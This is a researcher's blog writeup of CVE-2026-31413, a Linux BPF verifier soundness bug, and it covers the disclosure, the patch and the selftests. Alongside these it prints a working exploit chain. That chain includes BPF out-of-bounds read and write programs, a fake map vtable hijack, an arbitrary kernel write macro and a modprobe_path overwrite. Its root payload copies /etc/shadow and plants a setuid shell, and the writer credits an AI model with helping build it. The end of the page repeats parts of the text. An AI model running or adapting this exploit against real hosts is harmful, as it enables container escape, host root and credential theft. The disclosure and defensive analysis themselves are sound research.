nadsec // cve-2026-31413 // bpf verifier // container escape // modprobe_path // host root //

Original research · CVE-2026-31413

One Byte in the BPF Verifier to Container Escape

A soundness bug in the Linux BPF verifier's maybe_fork_scalars() function. One + 1 causes the verifier to skip an ALU instruction on a forked path, turning BPF_OR into arbitrary kernel R/W, vtable hijack, and full container escape to host root.

Read the full writeup ▶ Watch the demo

Author: NadSecApril 2026CVE-2026-31413

NadSec Research

BPF ESCAPE

Container escape via BPF verifier soundness bug.

Bug class

Verifier soundness

Impact

Host root

Arbitrary kernel R/W → escape

Required caps

CAP_BPF +

CAP_PERFMON · CAP_NET_ADMIN

Fix

1 character

insn_idx + 1 → insn_idx

Resources

Rat5ak/bpf-research Fix commit (c845894ebd6f)Patch series (lore.kernel.org)

All Blog Posts

NadSec original research

Live DemoContainer escape · BPF exploit · host root

Full exploit chain running inside a Docker container with CAP_BPF + CAP_SYSLOG + CAP_PERFMON. No --privileged, no SYS_ADMIN. The exploit overwrites modprobe_path, triggers an unknown binary format, and the kernel runs the payload as root on the host.

Full WriteupCVE-2026-31413 · April 2026

CVE-2026-31413: One Byte in the BPF Verifier to Container Escape

I found a soundness bug in the Linux BPF verifier - a + 1 in a push_stack() call that causes the verifier to skip an ALU instruction on a forked path. For BPF_OR, this means the verifier tracks dst = 0 while the CPU computes 0 | K = K. I wrote a full container escape: OOB read/write from a BPF map, vtable hijack, modprobe_path overwrite, root on the host. Then I authored a two-patch series - a one-character verifier fix and 90 lines of selftests - and got it merged into mainline.

Exploit source, patches, and selftests: GitHub.


CVE	CVE-2026-31413
Bug class	Verifier soundness - register value divergence
Root cause	`push_stack(env, env->insn_idx + 1, ...)` skips ALU insn on forked path
Introduced	`bffacdb80b93` - Linux 7.0-rc1 (Jan 14, 2026)
Fixed	`c845894ebd6f` - Linux 7.0-rc5 (Mar 22, 2026)
Affected	6.12.75+ (stable backport `dea9989a3f`) through 7.0-rc4
Impact	Arbitrary kernel R/W → container escape → host root
Required	`CAP_BPF` + `CAP_PERFMON` + `CAP_NET_ADMIN`
Fix	One character: `insn_idx + 1` → `insn_idx`

TL;DR

maybe_fork_scalars() forks verifier state when it sees ARSH + AND/OR with a constant. The pushed path gets dst = 0 and skips the ALU instruction. For AND that's fine: 0 & K = 0. For OR it's wrong: 0 | K = K, not 0.

The verifier thinks the register is zero. The CPU has K. I used that to build arbitrary OOB read/write from a BPF map value, leaked the map's kernel address, built a fake bpf_map_ops vtable, redirected map_push_elem through array_map_get_next_key for arbitrary write, and overwrote modprobe_path. Trigger an unknown binary format, kernel runs my script as root. In a container, full host escape.

One-character fix. Merged by Alexei Starovoitov on March 22. CVE-2026-31413 assigned by Greg Kroah-Hartman on April 12.

Background: The BPF Verifier

eBPF lets you load small programs into the kernel - packet filters, tracing hooks, security policies - without compiling a kernel module. The catch is that you're injecting code into ring 0. If that code has a bug, it's a kernel bug.

So before any BPF program runs, the kernel's verifier simulates every possible execution path. It tracks what each register holds (a pointer? a scalar? what range?), checks every memory access against map bounds, and rejects anything that could read or write out of bounds. If the verifier says a program is safe, the JIT compiles it to native machine code and runs it at full kernel privilege. There are no runtime bounds checks after that point. The verifier is the security boundary.

This is why verifier soundness bugs are different from normal memory corruption. With a heap overflow or UAF, you get one corruption primitive and have to work from there - spray the heap, groom objects, race a window. With a verifier bug, you get the kernel to believe a lie about a register's value. Every bounds check that depends on that register passes. The kernel approved your OOB access. It runs it without question. If you can line the register state up correctly, you get a clean and reliable primitive out of it.

How I Found It

I was auditing maybe_fork_scalars() - new code, added January 2026 in bffacdb80b93. State forking is always interesting because it's where the verifier splits into parallel exploration paths, and if any path tracks an incorrect value, everything downstream of that path is unsound.

The function forks when it sees ARSH + AND/OR with a constant source. Pushed path gets dst = 0, skips the ALU instruction. I was reading the push_stack(env, env->insn_idx + 1, ...) line and it clicked immediately - the + 1 means the pushed path never executes the ALU op. For AND, 0 & K = 0, so skipping is fine. For OR, 0 | K = K. The pushed path thinks the result is 0 when it's actually K.

I wrote a BPF program that evening. ARSH 63 to get {0, -1}, OR with a constant, conditional branch to separate the verifier paths, then add the "zero" register to a map pointer. The verifier approved map_value + 0. The CPU accessed map_value + K. KASAN confirmed the out-of-bounds access in testing.

OOB read/write by the next morning. Container escape by the next night. I used Claude (Opus 4.5) throughout - for working through the verifier's state forking logic, brainstorming exploitation primitives, and turning the OOB into a full escape chain. The vtable hijack approach came out of a back-and-forth where Claude walked through the bpf_map_ops function pointers looking for callable gadgets.

The Introducing Commit

Commit bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier") landed January 14, 2026 in 7.0-rc1. Alexei Starovoitov, co-developed by Puranjay Mohan. It added maybe_fork_scalars() to handle an LLVM DAGCombiner pattern:

w2 s>>= 31     // arithmetic shift right: w2 becomes 0 or -1
w2 &= -134     // AND with constant K

LLVM lowers select_cc setlt X, 0, A, 0 to sra + and. After the arithmetic right shift, the register is either 0 (non-negative input) or -1 (all ones). AND with a constant gives 0 or K.

The verifier can't track {0, K} in a single bpf_reg_state - its signed range [0, K] over-approximates, and that was causing it to reject valid Cilium programs. The fix: fork the verifier state. One path explores dst = 0, the other dst = -1, each tracking the precise value.

The implementation:

static int maybe_fork_scalars(struct bpf_verifier_env *env,
                              struct bpf_insn *insn,
                              struct bpf_reg_state *dst_reg)
{
    // ... condition check: dst range is [-1, 0], src is constant ...

    branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
    //                             ^^^^^^^^^^^^
    //                    pushed path resumes AFTER the ALU insn
    if (IS_ERR(branch))
        return PTR_ERR(branch);

    regs = branch->frame[branch->curframe]->regs;
    __mark_reg_known(&regs[insn->dst_reg], 0);   // pushed: dst = 0
    __mark_reg_known(dst_reg, -1ull);             // current: dst = -1
    return 0;
}

Two things happen on the pushed path:

The destination register is set to 0
Execution resumes at insn_idx + 1 - the instruction after the ALU op

For BPF_AND: dst = 0, skip the AND. Runtime: 0 & K = 0. Match. Sound.

For BPF_OR: dst = 0, skip the OR. Runtime: 0 | K = K. Mismatch. The verifier sees 0. The CPU has K. Unsound.

The function doesn't check the opcode. It was written for AND - where skipping the instruction is the same as executing it with dst = 0 - and got applied to OR too. For OR, that equivalence doesn't hold.

Triggering the Divergence

The trigger pattern is five instructions:

r6 = *(u64*)(map_value + 0)   // load a positive value (guaranteed by map init)
r6 s>>= 63                     // arithmetic shift: r6 = 0 (positive input)
r6 |= K                        // BUG: verifier forks, pushed path gets r6=0
if r6 s< 0 goto exit           // steers verifier paths
r9 += r6                       // verifier: r9 += 0 (in-bounds)
                                // runtime: r9 += K  (OOB)

The verifier explores two paths:

Current path (dst = -1): The OR executes, -1 | K is still -1. The branch r6 s< 0 is taken. The verifier follows the exit. This path is safe and the verifier confirms it.

Pushed path (dst = 0, skipped OR): r6 = 0. The branch r6 s< 0 is not taken. The verifier falls through to r9 += r6, sees r9 += 0, and approves the subsequent memory access as in-bounds.

Runtime (dst = 0, OR executes): The map value is positive, so after ARSH, r6 = 0. The OR executes: 0 | K = K. The branch K s< 0 is not taken (K is positive). r9 += K - an out-of-bounds access by K bytes, approved by the verifier as r9 += 0.

I control K. Arbitrary-offset OOB read or write, relative to any BPF map value.

The read version stores the leaked data into a second map for userspace retrieval. The write version loads a value from a third map and writes it at the OOB offset. Both pass the verifier.

Here's the full oob_read_prog - this is the actual code from the exploit, not pseudocode:

static int oob_read_prog(int map_fd, int dst_fd, int offset)
{
    int K = -offset;
    struct bpf_insn insn[] = {
        /* look up map_fd[0] → R0 = pointer to value, load seed into R6 */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_ST_MEM(BPF_DW, R10, -8, 0),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),       /* map_lookup_elem */
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_LDX_MEM(BPF_DW, R6, R0, 0),                  /* R6 = seed (positive) */

        /* look up dst_fd[0] → R9 = pointer to output buffer */
        BPF_LD_MAP_FD(R1, dst_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_ST_MEM(BPF_DW, R10, -8, 0),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_MOV64_REG(R9, R0),

        /* look up map_fd[0] again → R8 = base pointer for OOB access */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -8),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JNE, R0, 0, 2), BPF_MOV64_IMM(R0,0), BPF_EXIT_INSN(),
        BPF_MOV64_REG(R8, R0),

        /* === THE BUG === */
        BPF_ALU64_IMM(BPF_ARSH, R6, 63),                 /* R6 = 0 (positive seed) */
        BPF_ALU64_IMM(BPF_OR, R6, K),                    /* verifier: R6=0, runtime: R6=K */
        BPF_MOV64_IMM(R7, 0),
        BPF_ALU64_REG(BPF_SUB, R7, R6),                   /* R7 = -K = offset */
        BPF_ALU64_REG(BPF_ADD, R8, R7),                   /* R8 = map_value + offset (OOB) */
        BPF_LDX_MEM(BPF_DW, R0, R8, 0),                  /* OOB read: 8 bytes */
        BPF_STX_MEM(BPF_DW, R9, R0, 0),                  /* store to output map */
        BPF_MOV64_IMM(R0, 0),
        BPF_EXIT_INSN(),
    };
    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}

And the OOB write - same ARSH+OR trick, but writes a value from a third map into the OOB offset:

static int oob_write_prog(int map_fd, int val_fd, int offset)
{
    int K = -offset;
    struct bpf_insn insn[] = {
        /* look up map_fd[0], load seed, trigger the bug */
        BPF_LD_MAP_FD(R1, map_fd),
        BPF_ST_MEM(BPF_W, R10, -4, 0),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JEQ, R0, 0, 20), BPF_MOV64_REG(R9, R0),
        BPF_LDX_MEM(BPF_DW, R6, R9, 0),                  /* R6 = seed */

        BPF_ALU64_IMM(BPF_ARSH, R6, 63),                 /* R6 = 0 */
        BPF_ALU64_IMM(BPF_OR, R6, K),                    /* R6 = K (verifier: 0) */
        BPF_JMP_IMM(BPF_JSLT, R6, 0, 13),                /* skip if negative (verifier path) */

        BPF_MOV64_IMM(R7, 0),
        BPF_ALU64_REG(BPF_SUB, R7, R6),                   /* R7 = -K */
        BPF_ALU64_REG(BPF_ADD, R9, R7),                   /* R9 = OOB target */

        /* look up val_fd[0] → R8 = value to write */
        BPF_LD_MAP_FD(R1, val_fd),
        BPF_MOV64_REG(R2, R10), BPF_ALU64_IMM(BPF_ADD, R2, -4),
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0,0,0, 1),
        BPF_JMP_IMM(BPF_JEQ, R0, 0, 4),
        BPF_LDX_MEM(BPF_DW, R8, R0, 0),                  /* R8 = write value */

        BPF_STX_MEM(BPF_DW, R9, R8, 0),                  /* OOB write */
        BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 2),
        BPF_MOV64_IMM(R0, 0), BPF_JMP_IMM(BPF_JA, 0, 0, 0),
        BPF_EXIT_INSN(),
    };
    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, ARRAY_SIZE(insn));
}

To trigger either program, I attach it to a socket pair and push a packet through:

static int trigger_bpf_prog(int prog_fd)
{
    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks) < 0) return -1;
    setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));
    char buf[64] = "x";
    write(socks[1], buf, sizeof(buf));
    struct timeval tv = { .tv_sec = 1 };
    setsockopt(socks[0], SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
    read(socks[0], buf, sizeof(buf));
    close(socks[0]); close(socks[1]);
    return 0;
}

The negate-and-add pattern (R7 = 0 - R6; R8 += R7) lets us reach negative offsets from the map value - which is where the map's own metadata lives.

Exploitation: OOB to Container Escape

The full chain:

BPF_OR divergence (verifier: dst=0, runtime: dst=K)
    │
    ▼
Arbitrary OOB read/write relative to map value
    │
    ├── Read offset -136 → leak freeze_mutex.wait_list → map kernel address
    ├── Read offset -264 → leak ops vtable → confirm array_map_ops
    │
    ▼
Build fake bpf_map_ops vtable in map value (42 slots from kallsyms)
    → slot 15 (map_push_elem) = array_map_get_next_key
    │
    ▼
Corrupt map header via OOB writes
    → ops → fake vtable
    → map_type → BPF_MAP_TYPE_QUEUE (22)
    → max_entries → 0xFFFFFFFF
    │
    ▼
bpf(BPF_MAP_UPDATE_ELEM) dispatches through map_push_elem
    → array_map_get_next_key(map, value, flags)
    → writes *(u32*)value + 1 to *(u32*)flags
    → flags = attacker-controlled kernel address
    │
    ▼
Overwrite modprobe_path → "/tmpn/mo"
    │
    ▼
Exec unknown binary format → kernel runs /tmpn/mo as root
    │
    ▼
Restore map header → clean exit

The Target Layout

A BPF_MAP_TYPE_ARRAY is backed by struct bpf_array, which embeds struct bpf_map at offset 0. The actual map values start at offset 264 (after the bpf_array header + alignment). So from value[0], the map's own metadata sits at known negative offsets:

                   struct bpf_map (embedded in bpf_array)
                   ┌────────────────────────────────────────┐
offset from val[0] │                                        │
    -264           │ ops          (struct bpf_map_ops *)    │ ← vtable pointer
    -240           │ map_type     (u32)                     │
    -236           │ key_size     (u32)                     │
    -232           │ value_size   (u32)                     │
    -228           │ max_entries  (u32)                     │
                   │ ...                                    │
    -136           │ freeze_mutex.wait_list                 │ ← points back into struct
                   │ ...                                    │
       0           │ value[0]     ← our OOB origin          │
                   └────────────────────────────────────────┘

I verified these with pahole on the 6.12.76-docker vmlinux. On the tested kernel, the offsets matched exactly.

Step 1: Information Leak

Two OOB reads give me everything I need:

wait_list at offset -136. This is freeze_mutex.wait_list, a list_head that points back to itself when the mutex is uncontested. Its value is &map->freeze_mutex.wait_list - a kernel pointer into the map structure. Subtract 128 and I have the map's base address. Add 264 and I have the kernel address of value[0].

ops at offset -264. This is the bpf_map_ops vtable pointer. On an unmodified kernel it points to the global array_map_ops symbol. I read it to confirm the kernel isn't patched and to get the vtable address for cloning.

uint64_t wait_list = do_oob_read(victim, scratch, OFF_WAIT_LIST);
uint64_t map_addr = wait_list - 128;
uint64_t val_addr = map_addr + 264;

uint64_t ops = do_oob_read(victim, scratch, OFF_OPS);
if (ops != ARRAY_MAP_OPS) {
    fprintf(stderr, "[-] ops mismatch! Kernel might be patched.\n");
    return 1;
}

At this point I have: the map's kernel address, the address of my controlled data (value[0]), and the confirmed vtable pointer.

Step 2: Fake Vtable

bpf_map_ops has 42 function pointer slots. If I just zero out the ones I don't need, the kernel will NULL-deref the first time it touches one. So I resolve every symbol from /proc/kallsyms and build a complete copy:

uint64_t *vt = (uint64_t *)(val + 8);  // offset 8 in value (slot 0 is seed)
vt[ 0] = sym_alloc_check;       // map_alloc_check
vt[ 1] = sym_alloc;             // map_alloc
vt[ 2] = 0;                     // map_release (unused path)
vt[ 3] = sym_free;              // map_free
vt[ 4] = sym_get_next_key;      // map_get_next_key
// ...
vt[12] = sym_lookup_elem;       // map_lookup_elem
vt[13] = sym_update_elem;       // map_update_elem
vt[14] = sym_delete_elem;       // map_delete_elem
vt[15] = ARRAY_GET_NEXT_KEY;    // map_push_elem ← THE HIJACK
// ...
vt[40] = sym_mem_usage;         // map_mem_usage

Slot 15 is map_push_elem. In the real array_map_ops this is NULL (arrays don't support push). I replace it with array_map_get_next_key.

Why get_next_key? Its signature is:

int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)

It reads *(u32 *)key, increments it, and writes the result to *(u32 *)next_key. When called through the map_push_elem dispatch path:

int bpf_map_push_elem(struct bpf_map *map, void *value, u64 flags)
    → map->ops->map_push_elem(map, value, flags)

The flags argument lands in the next_key parameter. If I control flags, I control the write destination. The value written is *(u32 *)value + 1 - a small integer I can predict by setting the first 4 bytes of my push buffer.

Step 3: Map Corruption

Before I can use the fake vtable, I need to redirect the map to it and change its type so the kernel dispatches through map_push_elem. Three OOB writes, executed in order:

// Point ops at my fake vtable (lives at val_addr + 8)
exec_oob_write(prog_wr_ops, scratch, val_addr + 8);

// Disable max_entries bounds check
exec_oob_write(prog_wr_max, scratch, 0xFFFFFFFFULL);

// Change map_type to BPF_MAP_TYPE_QUEUE (22)
exec_oob_write(prog_wr_type, scratch, 22ULL);

The type change is critical. When userspace calls bpf(BPF_MAP_UPDATE_ELEM) on an array map, the kernel dispatches through map_update_elem. But on a queue map, the same syscall dispatches through map_push_elem - which now points to array_map_get_next_key.

I pre-load all six BPF programs (three writes + three restores) before corrupting anything. Once I corrupt the ops pointer, I can't load new BPF programs that reference this map - the verifier would follow the fake vtable and crash. Everything has to be staged in advance.

Step 4: Arbitrary Write via map_push_elem

Now I can write 4 bytes to any kernel address:

#define ARB_WRITE32(addr, val32) do { \
    uint32_t _v = (val32); \
    uint32_t _pv = _v - 1; \
    memset(push_buf, 0, sizeof(push_buf)); \
    memcpy(push_buf, &_pv, 4); \
    map_push(victim, push_buf, (addr)); \
} while(0)

map_push() calls bpf(BPF_MAP_UPDATE_ELEM) with flags = addr. The kernel dispatches to my hijacked map_push_elem → array_map_get_next_key(map, push_buf, addr). It reads *(u32 *)push_buf (which is val - 1), adds 1, and writes val to *(u32 *)addr.

The write primitive is a 4-byte u32 store via get_next_key. There are no alignment constraints - the kernel performs a normal *(u32 *)addr = val at whatever address we supply.

Step 5: modprobe_path Overwrite

modprobe_path is a global char[256] in the kernel, default /sbin/modprobe. When the kernel encounters an executable with an unknown magic number, it invokes modprobe_path as root to load the appropriate module. Overwrite it with a path I control, trigger an unknown binary format, and the kernel runs my script as root.

The target path is /tmpn/mo. I can't write arbitrary strings - I write 4 bytes at a time via get_next_key's integer increment. But I only need two writes:

// Original: "/sbin/modprobe\0"
// Write "/tmp" at offset 0:
ARB_WRITE32(MODPROBE_PATH + 0, 0x706d742fU);  // "/tmp" little-endian
// Write "\0\0\0\0" at offset 8 (null-terminate):
ARB_WRITE32(MODPROBE_PATH + 8, 0x00000000U);
// Bytes 4-7 are untouched: "n/mo" from original "/sbin/modprobe"
// Result: "/tmpn/mo\0"

In container mode, modprobe_path resolves in the init mount namespace - not the container's. So the payload script has to exist at /tmpn/mo on the host. With --pid=host or a shared PID namespace, I reach the host filesystem through /proc/1/root/:

snprintf(payload_script, sizeof(payload_script), "/proc/1/root/tmpn/mo");

The exploit writes the payload to /tmpn/mo on the host via /proc/1/root/tmpn/mo, reachable when the pod has a shared PID namespace (as is standard for Cilium/Falco sidecars). The demo simplifies this step by pre-staging the payload. The exploit then creates the trigger binary - 4 bytes of \xff - and executes it. The kernel doesn't recognize the format, looks up modprobe_path, finds /tmpn/mo, and runs it as root.

The payload:

#!/bin/sh
id > /tmp/pwned
cat /etc/shadow >> /tmp/pwned 2>/dev/null
cp /bin/sh /tmp/pwn 2>/dev/null && chmod 04755 /tmp/pwn 2>/dev/null

Step 6: Cleanup

After the modprobe_path write, I restore the map header - type, max_entries, ops - using the three pre-loaded restore programs. The map goes back to being a normal array. No dangling fake vtable, no kernel instability. The exploit is single-shot and leaves a clean state.

exec_oob_write(prog_rst_type, scratch, orig_type_key);
exec_oob_write(prog_rst_max, scratch, orig_max);
exec_oob_write(prog_rst_ops, scratch, orig_ops);

In my demo environment, the full chain from first OOB read to root shell took a couple of seconds.

v2: Data-Only Credential Overwrite

exploit_gke_v2.c replaces the modprobe_path technique with a pure data-only credential overwrite. It walks the kernel task list from init_task, finds the current process by PID, reads the cred pointer, and zeroes uid/gid/euid/egid/fsuid/fsgid + sets all capability fields to full. No vtable hijack, no map corruption, no filesystem interaction. The map stays as a valid BPF_MAP_TYPE_ARRAY throughout - zero race window.

It also auto-detects task_struct layout by probing init_task.pid and init_task.comm against known offset profiles, so no hardcoded offsets at the call site.

Who's Affected

The exploit requires CAP_BPF + CAP_PERFMON + CAP_NET_ADMIN. You won't get that from an unprivileged container or a normal user account on a hardened system. But there are a lot of contexts where you do have those caps.

Unprivileged BPF systems

If kernel.unprivileged_bpf_disabled=0 (check with sysctl), any local user can load BPF programs. This used to be the default on older distros and is sometimes enabled for dev/test environments. On those systems, this is a straight local privilege escalation - any user to root, no special permissions needed.

Most modern distros ship with unprivileged_bpf_disabled=1 or =2 (locked), so this path is closed on default installs of Ubuntu 22.04+, Debian 12+, Fedora, RHEL 9, etc.

Kubernetes / Container environments

This is where the bug hurts. Standard unprivileged containers drop CAP_BPF, so they can't trigger the bug. But a lot of infrastructure pods run with elevated caps:

Product	Default Privileges	Notes
Cilium (GKE Dataplane V2)	`CAP_SYS_ADMIN` + `CAP_NET_ADMIN`	Network policy, runs on every node
Falco	`privileged: true`	Runtime security, mounts /dev
Tetragon	`privileged: true`	eBPF observability
Datadog Agent	`CAP_SYS_ADMIN` + 7 more	Metrics, logs, APM
Pixie	`privileged: true`	eBPF-based observability
Tracee	`privileged: true` or BPF caps	Aqua's runtime security

These typically run as DaemonSets - one pod per node, cluster-wide. If an attacker compromises any of these pods (RCE in a web service on the same node, supply chain attack, SSRF into an agent API, etc.), they have the caps needed to run this exploit and escape to host root.

From host root on one node, lateral movement to other nodes is usually possible via the same DaemonSet (shared service accounts, mounted secrets, etc.).

Managed Kubernetes (GKE, EKS, AKS)

Google GKE uses Cilium as Dataplane V2 by default. If GKE nodes run an unpatched 6.12.x kernel (check your node pool version), any Cilium pod compromise turns into host root and node takeover. I built the exploit specifically for this scenario - that's why it's called exploit_gke.c.

Amazon EKS and Azure AKS are also potentially affected if they're running 6.12.x kernels with Cilium or similar BPF-based networking. Need to check specific AMI/VM image versions.

Important caveat: The exploit only works on kernels containing the vulnerable code (6.12.75-6.12.79, 6.18.x-6.18.20, 6.19.x-6.19.10, 7.0-rc1 to rc4). Most production K8s clusters run older LTS kernels. Check your node kernel version with uname -r before assuming exploitability.

Android

Android uses eBPF for network traffic accounting (netd), power profiling, and memory tracking. Current Android devices (14/15) use 6.1 LTS kernels, which are not affected. Android 16 may adopt 6.12 LTS - if it does, and if the vulnerable backport is included, the attack surface would be system services like netd and system_server that load BPF programs.

This is speculative and depends on Android's kernel adoption timeline. I filed with Android VRP for tracking.

Shared-kernel containers (LXC/LXD)

System containers that share the host kernel (unlike VMs) are fully exposed. Compromise the shared kernel = compromise the host + every other container on it. This is different from Docker/containerd where you're escaping to a host that might itself be a VM.

What it doesn't escape

This is a guest kernel bug, not a hypervisor escape. If you run the exploit inside an EC2 instance, you get root on that instance - you don't escape the Nitro hypervisor to the physical host or other tenants. Same for GCE, Azure VMs, KVM, etc. The hardware boundary holds.

Kernels affected

Branch	Affected	Fixed
6.12.y (LTS)	`dea9989a3f` through 6.12.79	6.12.80+
6.18.y	`4c122e8ae149` through 6.18.20	6.18.21+
6.19.y	`e52567173ba8` through 6.19.10	6.19.11+
mainline	7.0-rc1 through 7.0-rc4	7.0-rc5+

Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier") Fix commit: c845894ebd6f

CAP_BPF is not a safe capability. A verifier bug converts it into arbitrary kernel read/write. Products that grant it to workload pods should treat it as CAP_SYS_ADMIN.

The Fix

One character:

-    branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
+    branch = push_stack(env, env->insn_idx, env->insn_idx, false);

Instead of pushing the branch to insn_idx + 1 (skipping the ALU instruction), push to insn_idx - the instruction itself. The pushed path re-executes the ALU op with dst = 0:

AND: 0 & K = 0 ✓
OR: 0 | K = K ✓

The original approach was clever - skip the instruction and hardcode the result, saving one verifier step on the pushed path. But that optimization only works when the result of executing the instruction with dst = 0 is zero. That's true for AND and false for OR. The fix gives up the optimization: just run the instruction again and let the verifier compute the correct value for any opcode.

I went through three patch revisions:

v1: Added an opcode parameter to maybe_fork_scalars() and set dst = K for OR, dst = 0 for AND on the pushed path. Worked but added complexity.
v2: Eduard Zingerman suggested the re-execute approach - push to insn_idx instead of insn_idx + 1. Simpler, opcode-independent, eliminates the entire class of skip-vs-execute bugs.
v3: Single-line comment style in selftests, per Alexei Starovoitov's review. Same fix.

Merged as c845894ebd6f on March 22 by Alexei Starovoitov. Selftests in 0ad1734cc559. Reviewed by Eduard Zingerman, acked by Amery Hung.

The selftests cover three cases:

or_scalar_fork_rejects_oob - ARSH 63 + OR 8, value_size=8, access at offset 8 is OOB → must reject
and_scalar_fork_still_works - regression test, AND path still accepts
or_scalar_fork_allows_inbounds - OR 4, value_size=8, offset 4 is in-bounds → must accept

Linus merged d5273fd3ca0b ("Merge tag 'bpf-fixes'") with the note: "Fix unsound scalar fork for OR instructions (Daniel Wade)".

Timeline

Date	Event
2026-01-14	`bffacdb80b93` introduces `maybe_fork_scalars()` in 7.0-rc1
2026-03-04	Bug backported to 6.12.y stable as `dea9989a3f`
2026-03-11	I find the bug during verifier audit
2026-03-12	OOB read/write confirmed, exploit working
2026-03-13	Container escape PoC complete, video recorded
2026-03-14	Patch v3 sent to bpf@vger.kernel.org
2026-03-22	Fix merged by Alexei Starovoitov into bpf/bpf.git
2026-04-06	Linus merges bpf-fixes tag into mainline
2026-04-12	CVE-2026-31413 assigned by Greg Kroah-Hartman

Resources

Fix commit: c845894ebd6f ("bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR")
Selftests: 0ad1734cc559 ("selftests/bpf: Add tests for maybe_fork_scalars() OR vs AND handling")
Introducing commit: bffacdb80b93 ("bpf: Recognize special arithmetic shift in the verifier")
Patch series: lore.kernel.org
Exploit source + patches: github.com/Rat5ak/bpf-research

CVE-2026-31413 - Fixed in Linux 7.0-rc5. Affected: 6.12.75+ (stable backport) through 7.0-rc4.

*Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium

nadsec // cve-2026-31413 // bpf verifier // container escape // modprobe_path // host root //

Original research · CVE-2026-31413

One Byte in the BPF Verifier to Container Escape

Read the full writeup ▶ Watch the demo

Author: NadSecApril 2026CVE-2026-31413

NadSec Research

BPF ESCAPE

Container escape via BPF verifier soundness bug.

Bug class

Verifier soundness

Impact

Host root

Arbitrary kernel R/W → escape

Required caps

CAP_BPF +

CAP_PERFMON · CAP_NET_ADMIN

Fix

1 character

insn_idx + 1 → insn_idx

Resources

Rat5ak/bpf-research Fix commit (c845894ebd6f)Patch series (lore.kernel.org)

All Blog Posts

NadSec original research

Live DemoContainer escape · BPF exploit · host root

Full WriteupCVE-2026-31413 · April 2026

CVE-2026-31413: One Byte in the BPF Verifier to Container Escape

Exploit source, patches, and selftests: GitHub.


CVE	CVE-2026-31413
Bug class	Verifier soundness - register value divergence
Root cause	`push_stack(env, env->insn_idx + 1, ...)` skips ALU insn on forked path
Introduced	`bffacdb80b93` - Linux 7.0-rc1 (Jan 14, 2026)
Fixed	`c845894ebd6f` - Linux 7.0-rc5 (Mar 22, 2026)
Affected	6.12.75+ (stable backport `dea9989a3f`) through 7.0-rc4
Impact	Arbitrary kernel R/W → container escape → host root
Required	`CAP_BPF` + `CAP_PERFMON` + `CAP_NET_ADMIN`
Fix	One character: `insn_idx + 1` → `insn_idx`

TL;DR

One-character fix. Merged by Alexei Starovoitov on March 22. CVE-2026-31413 assigned by Greg Kroah-Hartman on April 12.

Background: The BPF Verifier

How I Found It

The Introducing Commit

w2 s>>= 31     // arithmetic shift right: w2 becomes 0 or -1
w2 &= -134     // AND with constant K

LLVM lowers select_cc setlt X, 0, A, 0 to sra + and. After the arithmetic right shift, the register is either 0 (non-negative input) or -1 (all ones). AND with a constant gives 0 or K.

The implementation:

static int maybe_fork_scalars(struct bpf_verifier_env *env,
                              struct bpf_insn *insn,
                              struct bpf_reg_state *dst_reg)
{
    // ... condition check: dst range is [-1, 0], src is constant ...

    branch = push_stack(env, env->insn_idx + 1, env->insn_idx, false);
    //                             ^^^^^^^^^^^^
    //                    pushed path resumes AFTER the ALU insn
    if (IS_ERR(branch))
        return PTR_ERR(branch);

    regs = branch->frame[branch->curframe]->regs;
    __mark_reg_known(&regs[insn->dst_reg], 0);   // pushed: dst = 0
    __mark_reg_known(dst_reg, -1ull);             // current: dst = -1
    return 0;
}

Two things happen on the pushed path:

The destination register is set to 0
Execution resumes at insn_idx + 1 - the instruction after the ALU op

For BPF_AND: dst = 0, skip the AND. Runtime: 0 & K = 0. Match. Sound.

For BPF_OR: dst = 0, skip the OR. Runtime: 0 | K = K. Mismatch. The verifier sees 0. The CPU has K. Unsound.

Triggering the Divergence

The trigger pattern is five instructions:

r6 = *(u64*)(map_value + 0)   // load a positive value (guaranteed by map init)
r6 s>>= 63                     // arithmetic shift: r6 = 0 (positive input)
r6 |= K                        // BUG: verifier forks, pushed path gets r6=0
if r6 s< 0 goto exit           // steers verifier paths
r9 += r6                       // verifier: r9 += 0 (in-bounds)
                                // runtime: r9 += K  (OOB)

The verifier explores two paths:

Current path (dst = -1): The OR executes, -1 | K is still -1. The branch r6 s< 0 is taken. The verifier follows the exit. This path is safe and the verifier confirms it.

Pushed path (dst = 0, skipped OR): r6 = 0. The branch r6 s< 0 is not taken. The verifier falls through to r9 += r6, sees r9 += 0, and approves the subsequent memory access as in-bounds.

I control K. Arbitrary-offset OOB read or write, relative to any BPF map value.

The read version stores the leaked data into a second map for userspace retrieval. The write version loads a value from a third map and writes it at the OOB offset. Both pass the verifier.

